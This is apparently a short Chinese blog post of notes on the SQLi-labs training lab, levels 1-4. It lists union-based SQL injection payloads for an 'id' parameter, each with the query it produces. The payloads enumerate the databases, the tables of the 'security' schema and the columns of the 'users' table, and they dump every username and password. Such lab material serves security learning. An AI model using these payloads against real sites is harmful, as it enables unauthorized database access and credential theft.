sqlilabs 1-4

near '1' --+ ' LIMIT 0,1

?id=999' union select 1,database(),5 --+ 当前数据库
?id=999' union select 1,user(),5 --+ 当前用户名

爆数据库
?id=-1' union select 1,group_concat(schema_name),5 from information_schema.schemata --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata --+ LIMIT 0,1

爆 security 数据表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1

爆users表的列
?id=-1' union select 1,group_concat(column_name),5 from information_schema.columns where table_name='users' --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1

爆 users 的所有数据
?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1

posted @ 2018-04-16 22:21 CMlhc 阅读(112) 评论(0) 编辑收藏举报

刷新页面返回顶部

CMlhc的博客